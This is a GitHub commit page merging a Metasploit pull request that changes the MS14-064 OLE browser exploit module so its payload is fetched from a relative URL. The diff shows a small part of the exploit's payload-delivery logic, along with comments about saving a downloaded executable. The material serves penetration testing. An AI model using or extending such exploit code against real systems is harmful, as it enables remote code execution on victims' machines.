Skip to content

Commit 955c055

Browse files
committed
Land rapid7#4988, Relative URL for ms14_064_ole_code_execution
2 parents 68cb766 + 89e27d9 commit 955c055

File tree

1 file changed

+1
-4
lines changed

1 file changed

+1
-4
lines changed

modules/exploits/windows/browser/ms14_064_ole_code_execution.rb

Lines changed: 1 addition & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -277,10 +277,7 @@ def vbs_vector(prep)
277277
vbs_name = "#{Rex::Text.rand_text_alpha(rand(16)+4)}.vbs"
278278
gif_name = "#{Rex::Text.rand_text_alpha(rand(5)+3)}.gif"
279279

280-
payload_src = (datastore['SSL'] ? 'https' : 'http')
281-
payload_src << '://'
282-
payload_src << (datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST'])
283-
payload_src << ":#{datastore['SRVPORT']}#{get_module_resource}/#{gif_name}"
280+
payload_src = "#{gif_name}"
284281

285282
# I tried to use ADODB.Stream to save my downloaded executable, but I was hitting an issue
286283
# with it, so I ended up with Scripting.FileSystemObject. Not so bad I guess.

0 commit comments

Comments
 (0)